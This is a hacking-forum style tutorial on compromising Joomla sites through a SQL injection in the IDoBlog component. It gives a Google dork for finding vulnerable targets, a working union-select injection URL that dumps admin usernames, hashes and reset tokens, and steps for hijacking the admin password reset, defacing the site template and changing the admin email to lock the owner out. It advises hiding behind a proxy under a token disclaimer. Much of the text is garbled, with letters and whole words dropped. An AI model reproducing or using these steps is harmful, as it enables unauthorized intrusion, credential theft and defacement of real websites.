how to joomla(cms) website.. full tut..!!!!

Level: NFN (Not For Noobs)
Tools required:
SQL-i Knowledge
reiluke SQLiHelper 2.7:http://filetram.com/download/file/4390169166/sqlihelper-2-rar
Joomla! Query Knowledge
DISCLAIMER:THIS TUTORIAL IS FOR EDUION PURPOSE ONLY!!! YOU MAY NOT RD THIS TUTORIAL IF YOU DON'T UNDERSTAND AND AGREE TO THIS DISCLAIMER. ME AS AUTHOR OF THIS TUTORIAL NOT BE HELD RESPONSIBLE FOR THE MISUSE OF THE INFORMATION CONTAINED WITHIN THIS TUTORIAL. IF YOU ABUSE THIS TUTORIAL FOR ILLEGAL PURPOSES I WILL NOT BE HELD RESPONSIBLE FOR ANY ACTION THAT MAY BE TAKEN AGAINST YOU AS A RESULT OF YOUR MISUSE.
NOTE:USE ANONYMOUS PROXY!!!
Introduction
Joomla! as Stable-Full Package is probably unable and If someone tells that Joomla, talking rubbish!!!But people still sites that use Joomla as Content Management System?!?Joomla is made of components and modules and there are some developers apart from official tm that offer their solutions to improve Joomla. That components and modules mede by that other developers are wk spots!
We site that use Joomla! v1.5.6 and after that v1.5.9 through IDoBlog v1.1, but I can't tell that I Joomla!
Finding And Target
Those two steps could go in different order, depend what you find first target or ...
Google dork:inurl:"option=com_idoblog"Comes up with results for about 140,000 pages

Atinj3ct0r.comsrch for:com_idoblogGive us back Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln

==Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln==
index.p?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,con_ws(0x3a,username,),3,4,5,6,7,8,9,10,​11,12,13,14,15,16+from+jos_users--
can be separated in two parts:
Part Iindex.p?option=com_idoblog&task=profile&Itemid=1337&userid=62This part opening blog Admin page and if Admin page don't exist, won't worked (not completely confirmed)
Part II+union+select+1,con_ws(0x3a,username,),3,4,5,6,7,8,9,10,11,12,13,14,1​5,16+from+jos_users--This part looking for username and from jos_users table
Testing Vulnerability
Disable s for faster page loading:[Firefox]Tools >> Options >> Content (tab menu) >> and unclick 'Load s automatically'
Go to::http://www.site.com/index.p?option=com_idoblog&view=idoblog&Itemid=22Site load normally...
Go to::http://www.site.com/index.p?option=com_idoblog&task=profile&Itemid=1337&userid=62Site content blog Profile Admin
Go to::http://www.site.com/index.p?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--Site is vulnerable
Inject Target
Openreiluke SQLiHelper 2.7In Target copy:http://www.site.com/index.p?option=com_idoblog&task=profile&Itemid=1337&userid=62and click on InjectFollow standard steps until you find Column Name, as a result we have

Notice that from inj3ct0r wouldn't work here because it looking forjos_userstable and as you can seeour target usejos153_userstable for storing data
Let Dump username, email, from Column Name jos153_users. Click on Dump Now

username: adminemail: info@site.com: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI
Joomla! 1.5.x uses md5 to hash the s. When the s are crted, they are hashed with a32 character salt that is appended to the end of the string. The is stored as{TOTAL HASH}:{ORIGINAL SALT}. So to that take time and time...
The siest way to is to reset Admin !
Admin Reset
Go to::http://www.site.com/index.p?option=com_user&view=resetThis is standard Joomla! query for reset request

Forgot your ? page will load.In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit.If you find right admin email, Confirm your account. page will load, asking for Token:
Finding Token
To find token go back to reiluke SQLiHelper 2.7 and dump username andfrom Column Name jos153_users

username: admin: 5482dd177624761a290224270fa55f1d
5482dd177624761a290224270fa55f1d is 32 char verifiion token, enter it and pres Submit.

If you done everything ok, Rest your page will load. Enter your new ...
After that go to::http://www.site.com/administrator/Standard Joomla portal content management system
Enter username admin and your , click on LoginGo to Extensions >> Template Manager >> Default Template Name >> Edit HTMLIn Template HTML Editor insert your defaced , click Apply, Save and you are done!!!

To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail